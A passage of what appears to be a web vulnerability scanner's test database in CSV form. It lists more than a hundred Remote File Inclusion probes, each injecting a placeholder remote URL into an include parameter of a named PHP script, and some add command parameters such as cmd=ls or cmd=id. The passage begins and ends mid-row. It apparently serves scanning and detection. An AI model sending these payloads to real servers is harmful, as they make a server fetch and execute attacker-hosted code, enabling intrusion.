(RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004898\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/Beautifier/Core.php?BEAUT_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004899\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/HTML_oben.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004900\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/HTML_oben.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004901\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/SQuery/gameSpy2.php?libpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004902\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/bbs.lib.inc.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004903\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/class_yapbbcooker.php?cfgIncludeDirectory=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004904\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/classes.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004905\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/client.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004906\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/cls_headline_prod.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004907\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/cls_listorders.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004908\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/cls_viewpastorders.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004909\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/common.php?XOOPS_ROOT_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004910\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/common_functions.php?baros_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004911\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/config.inc.php?racine=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004912\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/copyright.php?tsep_config[absPath]=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004913\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/customize.php?l=@RFIURL&text=Hello%20World\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004915\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/default_header.php?script_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004916\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/define.php?INC_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004917\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/disp_form.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004918\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/disp_smileys.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004919\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/dom.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004920\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/dtd.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004921\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004922\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/engine/content/elements/menu.php?CONFIG[AdminPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004923\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/forms.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004924\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/global.php?pfad=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004925\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/header.php?cs_base_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004926\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/html/nettools.popup.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004927\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc.foot.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004928\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_ext/spaw/dialogs/table.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004929\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004930\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004931\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe1.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004932\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe1.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004933\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe3.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004934\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/inc_freigabe3.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004935\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/include_stream.inc.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004936\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/include_top.php?g_include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004937\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/includes.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004938\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/index.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004939\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/init.inc.php?G_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004940\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/issue_edit.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004941\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/lib/lib_slots.php?main_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004942\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/lib/lib_stats.php?main_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004943\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/lib/lib_users.php?main_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004944\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/little_news.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004945\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/livre_include.php?no_connect=lol&chem_absolu=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004946\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/loading.php?path_include=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004947\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/mail.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004948\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/menu_builder.php?config[page_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004949\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004950\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/monitoring/engine/MakeXML.php?fileOreonConf=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004951\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/parser.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004952\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/IT.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004953\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/IT.php?basepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004954\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/ITX.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004955\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/ITX.php?basepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004956\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/IT_Error.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004957\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/pear/IT_Error.php?basepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004958\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/phpxd/phpXD.php?appconf[rootpath]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004959\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/prodler.class.php?sPath=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004960\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/scripts/export_batch.inc.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004961\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/scripts/run_auto_suspend.cron.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004962\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/scripts/send_email_cache.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004963\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/startup.inc.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004964\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/themes/themefunc.php?myNewsConf[path][sys][index]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004965\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/timesheet.php?config[include_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004966\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include/urights.php?CRM_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004967\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/admin_board2.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004968\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/admin_logger.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004969\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004970\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/ajax_listado.php?urlModulo=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004971\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004972\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004973\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/bbcb_mg.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004974\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/begin.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004975\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/blogger.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004976\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/class/class_tpl.php?cache_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004977\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/class_template.php?quezza_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004978\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/classes/pctemplate.php?pcConfig[smartyPath]=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004979\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.inc.php?CONFIG[BASE_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004980\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.php?module_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004981\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.php?root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004982\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.php?root=@RFIURL??\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004983\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004984\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/common.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004985\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/config.inc.php?racineTBS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004986\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/config/master.inc.php?fm_data[root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004987\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/config/master.inc.php?fm_data[root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004988\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/connection.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004989\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/dbal.php?eqdkp_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004990\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/events.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004991\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/footer.html.inc.php?tc_config[app_root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004992\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/footer.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004993\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/footer.php?PHPGREETZ_INCLUDE_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004994\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions.inc.php?sitepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004995\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions.php?location=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004996\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004997\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004998\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions/auto_email_notify.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004999\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions/html_generate.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005000\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions/master.inc.php?fm_data[root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005001\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions/master.inc.php?fm_data[root]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005002\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions/validations.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005003\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_admin.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005004\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_install.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005005\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_kb.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005006\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_kb.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005007\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_mod_user.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005008\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_portal.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005009\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_portal.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005010\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/functions_user_viewed_posts.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005011\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/global.php?nbs=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005012\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/header.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005013\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/header.inc.php?dateiPfad=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005014\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/include_once.php?include_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005015\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/init.php?includepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005016\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/iplogger.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005017\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/kb_constants.php?module_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 